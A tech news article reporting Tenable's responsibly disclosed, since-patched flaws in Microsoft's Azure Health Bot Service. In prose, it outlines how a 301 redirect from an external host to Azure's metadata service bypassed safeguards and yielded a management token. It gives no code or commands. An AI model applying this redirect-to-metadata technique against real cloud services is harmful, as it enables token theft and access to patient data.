Microsoft’s AI healthcare bots might have some worrying security flaws
Researchers were able to bypass certain protections in Azure Health Bot Service
When you purchase through links on our site, we may earn an affiliate commission.Here’s how it works.
Microsoft’s AI-powered bots for the healthcare industry have been found to be vulnerable in a way that allowed threat actors to move across the target IT infrastructure, and even steal sensitive information.
Cybersecurity researchers Tenable, whodiscovered the flawsand reported them to Microsoft, outlined how the flaws in Azure Health Bot Service enabled lateral movement throughout the network, and thus access to sensitive patient data.
The Azure AI Health Bot Service is a tool enabling developers to build and deploy virtual health assistants, powered by artificial intelligence (AI). That way, healthcare orgs can cut down on cost and improve efficiency, without compromising on compliance.
Data Connections
Generally speaking, digital assistants also work with plenty of sensitive information, which makes security and data integrity paramount.
Tenable sought to analyze how thechatbothandles the workload, and found a few issues in a feature called “Data Connections”, designed to pull data from other services. The researchers pointed out that the tool does have built-in safeguards that block unauthorized access to internal APIs, but they managed to bypass them by issuing redirect responses while reconfiguring a data connection through a controlled external host.
They set up the host to respond to requests with a 301 redirect response aimed at Azure’s metadata service (IMDS). That gave them access to a valid metadata response which, in turn, gave them an access token for management.azure.com. With the token, they were able to get a list of all the subscriptions it grants access to.
A few months ago, Tenable reported its findings to Microsoft, and soon after all regions were patched. There is no evidence the flaw was exploited in the wild, it added.
Are you a pro? Subscribe to our newsletter
Sign up to the TechRadar Pro newsletter to get all the top news, opinion, features and guidance your business needs to succeed!
“The vulnerabilities discussed….involve flaws in the underlying architecture of the AI chatbot service rather than the AI models themselves,” the researchers noted, adding this, “highlights the continued importance of traditional web application and cloud security mechanisms in this new age of AI powered services.”
More from TechRadar Pro
Sead is a seasoned freelance journalist based in Sarajevo, Bosnia and Herzegovina. He writes about IT (cloud, IoT, 5G, VPN) and cybersecurity (ransomware, data breaches, laws and regulations). In his career, spanning more than a decade, he’s written for numerous media outlets, including Al Jazeera Balkans. He’s also held several modules on content writing for Represent Communications.
A new form of macOS malware is being used by devious North Korean hackers
Scammers are using fake copyright infringement claims to hack businesses
Trying to get the AMD Ryzen 7 9800X3D CPU? It seems only scalpers have it and they’re jacking up the price